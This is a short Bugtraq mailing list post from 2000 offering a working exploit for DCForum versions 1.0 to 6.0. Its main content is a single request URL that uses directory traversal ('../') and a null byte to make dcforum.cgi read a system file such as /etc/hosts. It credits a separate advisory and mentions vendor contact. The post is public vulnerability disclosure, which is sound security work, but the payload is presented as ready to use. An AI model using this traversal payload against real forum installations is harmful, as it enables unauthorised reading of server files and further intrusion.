Bugtraq mailing list archives
DCForum Exploit (1.0 - 6.0)
From: SteeLe <SteeLe () PRIVACYX COM>
Date: Thu, 28 Dec 2000 10:26:01 -0500
Heres an working exploit, dont know why i sent a script. I guess it was for the lazy people but anyway simple exploitation: http://localhost/dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/hosts%00 The Vendor has been contacted long ago by the original founder of this bug CGISecurity.com. Before using the exploit there is information you should read for side effects and other things. CGISecurity.com wrote an advisory and it can be read at http://www.cgisecurity.com/advisory/2.txt steeLe
Current thread:
- DCForum Exploit (1.0 - 6.0) SteeLe (Dec 28)